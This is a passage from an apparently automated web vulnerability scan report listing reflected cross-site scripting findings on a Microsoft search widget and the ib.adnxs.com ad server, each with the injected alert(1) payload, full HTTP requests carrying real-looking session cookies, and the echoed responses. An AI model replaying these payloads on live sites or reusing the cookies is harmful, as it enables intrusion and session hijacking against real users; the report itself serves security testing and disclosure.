The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 49dd0<img%20src%3da%20onerror%3dalert(1)>9604d92119d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dd0<img src=a onerror=alert(1)>9604d92119d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&watermark=MSDN&focusOnInit=false&49dd0<img%20src%3da%20onerror%3dalert(1)>9604d92119d=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/devlabs/dd491992.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.NumberOfVisits=1&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=110&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
ntCoent-Length: 12967
Content-Type: application/x-javascript
ETag: 6dc140f09e6918cfe1062fa7d8ed8aba
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12967
Cache-Control: public, max-age=43199
Expires: Sat, 23 Jul 2011 14:02:15 GMT
Date: Sat, 23 Jul 2011 02:02:16 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&49dd0<img src=a onerror=alert(1)>9604d92119d=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN w
...[SNIP]...

3.63. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84e17<img src=a onerror=alert(1)>8704c19d382 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&Refinement=123&watermark=Visual%20Studio&focusOnInit=false&84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
ntCoent-Length: 12991
Content-Type: application/x-javascript
ETag: 4f5e427688f9144d4c7cad56af60cd6a
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Content-Length: 12991
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:07:59 GMT
Date: Sat, 23 Jul 2011 02:07:59 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
EmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=123&84e17<img src=a onerror=alert(1)>8704c19d382=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Visual
...[SNIP]...

3.64. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f199c'-alert(1)-'40bc55a6c60 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAAf199c'-alert(1)-'40bc55a6c60&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:39 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAAf199c'-alert(1)-'40bc55a6c60&referrer=http://games.myyearbook.com/">
...[SNIP]...

3.65. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b02'-alert(1)-'8ca7da62f17 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..47b02'-alert(1)-'8ca7da62f17&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:35 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..47b02'-alert(1)-'8ca7da62f17&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/">
...[SNIP]...

3.66. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8205e'-alert(1)-'fa7ea69290f was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/8205e'-alert(1)-'fa7ea69290f&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:43 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
QgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/8205e'-alert(1)-'fa7ea69290f">
...[SNIP]...

3.67. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8c9'-alert(1)-'aca8e4c3d50 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-85d8c9'-alert(1)-'aca8e4c3d50&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
